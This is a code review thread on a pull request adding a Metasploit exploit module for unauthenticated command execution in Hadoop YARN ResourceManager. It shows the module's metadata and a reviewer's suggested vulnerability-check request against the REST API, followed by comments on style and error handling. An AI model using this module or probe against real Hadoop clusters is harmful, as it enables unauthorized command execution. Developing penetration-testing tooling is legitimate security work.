modules/exploits/linux/http/hadoop_unauth_exec.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hadoop YARN ResourceManager Unauthorized Command Execution",
+      'Description'    => %q{
+          This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'cbmixx',                                 # Proof of concept
+          'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
+          [ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
+        ],
+
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Automatic',                             {} ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 19 2016",
+      'DefaultTarget'  => 0
+      ))
+
+    register_options([
+      Opt::RPORT(8088)
+    ])
+  end
+
+
```

Comment:
This `check` method will only ever return `Unknown` or `Vulnerable`.

Generally speaking:
* `Unknown` is reserved for when something goes wrong, like a connection failure
* `Vulnerable` is reserved when the remote host is confirmed vulnerable

Suggest:

```ruby
  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
      'method' => 'POST'
    )

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body.include?('application-id')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end
```

Also, `&&` is preferred over `and`, and single quotes `'` are preferred over double quotes `"` when string interpolation is not required.

Reply:
I have updated it. 
But it seems that string would never be printed in `check` function.

Reply:
`vprint_*` methods are printed only when `VERBOSE` is set to `true`. [Metasploit scripture](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method) preaches silent `check` methods.

Reply:
#10229

Reply:
Before #10303, you should `rescue Rex::ConnectionError` even with `send_request_cgi`.